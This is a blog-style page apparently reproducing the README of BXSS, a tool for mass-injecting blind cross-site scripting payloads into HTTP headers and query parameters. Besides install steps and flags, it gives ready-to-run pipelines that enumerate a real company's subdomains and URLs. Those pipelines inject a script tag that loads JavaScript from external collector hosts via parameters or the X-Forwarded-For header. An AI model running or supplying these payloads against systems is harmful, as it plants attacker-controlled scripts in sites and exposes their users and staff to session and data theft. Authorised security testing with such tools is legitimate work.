BXSS : A Blind XSS Injector Tool

BXSS is a blind XSS injector tool.

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments

— Coded by @z0idsec —
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default “User-Agent”)
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload

  • Blind XSS In Parameters

$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters

  • Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload ‘”><script src=https://z0id.xss.ht></script>’ -header “X-Forwarded-For”

R K

Recent Posts

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

6 days ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

6 days ago

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

6 days ago

How to Undo and Redo in Vim or Vi

Vim and Vi are among the most powerful text editors in the Linux world. They…

6 days ago

How to Unzip and Extract Files in Linux

Working with compressed files is a common task for any Linux user. Whether you are…

6 days ago

Free Email Lookup Tools and Reverse Email Search Resources

In the digital era, an email address can reveal much more than just a contact…

6 days ago